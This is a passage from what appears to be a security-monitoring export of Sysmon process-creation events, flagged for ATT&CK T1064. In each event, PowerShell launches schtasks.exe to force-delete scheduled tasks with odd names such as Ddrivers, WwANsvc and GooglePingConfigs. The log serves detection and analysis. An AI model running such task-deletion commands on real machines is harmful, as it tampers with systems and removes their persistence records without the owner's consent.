MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Ddrivers /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.494061700Z"",""eventRecordID"":""2249"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.491\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-001010fc1900}\r\nProcessId: 7604\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Ddrivers /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:37.491"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-001010fc1900}"",""processId"":""7604"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Ddrivers /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.806",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.469 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-001081fa1900} +ProcessId: 7548 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Bluetooths /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Bluetooths /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.471119600Z"",""eventRecordID"":""2248"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.469\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-001081fa1900}\r\nProcessId: 7548\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Bluetooths /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:37.469"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-001081fa1900}"",""processId"":""7548"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Bluetooths /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.790",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.445 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-0010edf81900} +ProcessId: 7472 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WwANsvc /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WwANsvc /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.449861400Z"",""eventRecordID"":""2247"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.445\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-0010edf81900}\r\nProcessId: 7472\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WwANsvc /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:37.445"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-0010edf81900}"",""processId"":""7472"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WwANsvc /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.759",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.424 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-00105ff71900} +ProcessId: 7392 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN MiscfostNsi /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN MiscfostNsi /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.426681500Z"",""eventRecordID"":""2246"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.424\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-00105ff71900}\r\nProcessId: 7392\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN MiscfostNsi /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:37.424"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-00105ff71900}"",""processId"":""7392"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN MiscfostNsi /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.741",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.403 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-0010d0f51900} +ProcessId: 7320 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN HomeGroupProvider /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HomeGroupProvider /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.406695300Z"",""eventRecordID"":""2245"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.403\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-0010d0f51900}\r\nProcessId: 7320\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HomeGroupProvider /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:37.403"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-0010d0f51900}"",""processId"":""7320"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN HomeGroupProvider /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.721",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.381 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-001040f41900} +ProcessId: 7280 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN GooglePingConfigs /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN GooglePingConfigs /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.383453900Z"",""eventRecordID"":""2244"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.381\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-001040f41900}\r\nProcessId: 7280\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN GooglePingConfigs /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:37.381"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-001040f41900}"",""processId"":""7280"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN GooglePingConfigs /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.707",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.355 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-0010b1f21900} +ProcessId: 4248 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN RavTask /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN RavTask 